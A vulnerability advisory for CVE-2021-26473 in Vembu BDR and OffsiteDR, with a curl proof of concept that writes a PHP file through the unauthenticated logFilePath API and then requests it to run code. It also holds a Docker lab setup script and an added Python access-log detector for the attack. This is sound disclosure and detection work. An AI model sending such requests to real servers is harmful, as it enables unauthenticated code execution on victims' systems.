
CVE-2021-26473 - Unauthenticated arbitrary file upload and command execution in Vembu products

CVE CVE-2021-26473
Discovered by
(Additional) researcher(s)
Products
  • VembuBDR
  • VembuOffsiteDR
  • Other products in this family may also be affected
Versions
  • VembuBDR v4.2.0.1
  • VembuBDR v4.2.0
  • VembuBDR v4.1.0
  • VembuBDR v4.0.2
  • VembuBDR v4.0.1
  • VembuBDR v4.0.0
  • VembuBDR v3.9.1 Update1
  • VembuBDR v3.9.0 Update1
  • VembuBDR v3.9.0
  • VembuBDR v3.8.0
  • VembuBDR v3.7.0
  • VembuBDR v3.5.0.0
  • VembuOffsiteDR v4.2.0.1
  • VembuOffsiteDR v4.2.0
  • Other products and versions of products in this family may also be affected
Page author Frank Breedijk
CVSS Base Score

Summary

The HTTP API at /sgwebservice_o.php (action logFilePath) allows an unauthenticated attacker to write arbitrary files with the privileges of the web server process. These files can then be executed remotely by requesting them through the web server.

How to reproduce

Step 1: Start up a Docker environment (see the script below)

Step 2: In a different terminal run the following command:

$ curl 'http://localhost:6060/sgwebservice_o.php?Action=logFilePath&path=./my_php_info.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A'
 
<StoreGrid><Message Error="1" Message="Successfully written." Code="500" /></StoreGrid> 

Step 3: Validate that a file was written:

$ docker exec VembuBDR4201 /bin/bash -c "cd /home/vembubdr/Vembu/VembuBDR/htmlgui;ls -l my_*;echo ---;cat my_*;echo ---"
-rw-r--r-- 1 www-data www-data 19 Feb 11 15:35 my_php_info.php
---
<?php phpinfo() ?>
---

Call the script to get command execution:

$ curl 'http://localhost:6060/my_php_info.php'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
th {position: sticky; top: 0; background: inherit;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>PHP 7.4.3 - phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
…

Impact

This vulnerability allows an attacker to upload an arbitrary file in the context of the web server and then execute it.
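The following is an added detection example, not part of the original advisory or the vendor's code. It scans combined-format web server access log lines (constructed samples, one of which mirrors the advisory's request) for calls to sgwebservice_o.php with Action=logFilePath, decodes the path and value parameters to show what would have been written, and then flags any later request for the written web path, which is the execution step described in the advisory. The log format, field names and sample IP addresses are assumptions.

```python
"""Detection helper for CVE-2021-26473 exploitation attempts in access logs.

Added example, not part of the original advisory. Assumes Apache/nginx
combined log format; all log lines below are constructed samples.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines. The first request mirrors the advisory's
# reproduction step, the third is the follow-up request that runs the file.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2021:15:35:02 +0000] "GET /sgwebservice_o.php?Action=logFilePath&path=./my_php_info.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A HTTP/1.1" 200 97 "-" "curl/7.68.0"
10.0.0.7 - - [11/Feb/2021:15:35:10 +0000] "GET /sgwebservice_o.php?Action=getVersion HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Feb/2021:15:35:20 +0000] "GET /my_php_info.php HTTP/1.1" 200 8124 "-" "curl/7.68.0"
10.0.0.9 - - [11/Feb/2021:15:36:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Split one access log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse_request(entry):
    """Return a finding for a logFilePath write attempt, or None for other requests."""
    url = urlsplit(entry["target"])
    if not url.path.lower().endswith("sgwebservice_o.php"):
        return None
    # parse_qs URL-decodes the values, so 'value' shows the bytes that would be written
    params = {k.lower(): v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    if params.get("action", "").lower() != "logfilepath":
        return None
    path = params.get("path", "")
    value = params.get("value", "")
    return {
        "ip": entry["ip"],
        "ts": entry["ts"],
        "status": entry["status"],
        "path": path,
        "value": value,
        # A .php target or PHP tags in the payload means the write is executable
        "writes_php": path.lower().endswith(".php") or "<?php" in value.lower(),
        # Any '..' path component indicates an attempt to leave the web root
        "traversal": ".." in path.replace("\\", "/").split("/"),
    }


def scan_log(text):
    """Scan log text; return (write_findings, execution_findings)."""
    writes, executions = [], []
    written = {}  # normalised web path of a dropped file -> the write finding
    for line in text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        finding = analyse_request(entry)
        if finding:
            writes.append(finding)
            # './my_php_info.php' written in the web root is served as '/my_php_info.php'
            key = "/" + posixpath.normpath(finding["path"]).lstrip("/")
            written[key] = finding
            continue
        req_path = urlsplit(entry["target"]).path
        if req_path in written:
            executions.append({"ip": entry["ip"], "ts": entry["ts"],
                               "path": req_path, "written_by": written[req_path]["ip"]})
    return writes, executions


if __name__ == "__main__":
    writes, executions = scan_log(SAMPLE_LOG)
    for w in writes:
        print(f"[write] {w['ts']} {w['ip']} path={w['path']!r} php={w['writes_php']} "
              f"traversal={w['traversal']} payload={w['value']!r}")
    for e in executions:
        print(f"[exec]  {e['ts']} {e['ip']} requested dropped file {e['path']} "
              f"(written from {e['written_by']})")
```

Run the script against an exported access log by replacing SAMPLE_LOG with the file contents; a write finding followed by an execution finding from the same client is the sequence shown in the reproduction steps above.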

About the Docker test environment

In order to set up the docker test environment, we used the following script:

#!/bin/bash

# Network: create the dedicated bridge network once (the name checked must
# match the name created, otherwise the create call fails on every rerun)
if [[ $(docker network ls | grep vembu-network | wc -l) -lt 1 ]]; then
  docker network create --subnet=172.18.0.0/16 vembu-network
fi

# Start Database container
mkdir -p DB
# Remove any previous instance so the run below does not collide with it
while [[ $(docker ps -a | grep VembuDatabase | wc -l) -ge 1 ]]; do
  docker kill VembuDatabase
  docker rm VembuDatabase
  sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v $PWD/DB:/vembu vembubdr/bdr-latest:psql-latest

# Wait for database port to open (bash's /dev/tcp pseudo-device acts as a port probe)
echo -n "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432"; do
  echo -n "."
  sleep 1
done
echo

# Start APP container
mkdir -p APP
while [[ $(docker ps -a | grep VembuBDR4201 | wc -l) -ge 1 ]]; do
  docker kill VembuBDR4201
  docker rm VembuBDR4201
  sleep 1
done

docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse -p 6060:6060 -p 32004:32004 -v $PWD/APP:/vembu vembubdr/bdr-latest:vembubdr-4201-u1

# Wait for app port to open
echo -n "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060"; do
  echo -n "."
  sleep 1
done
echo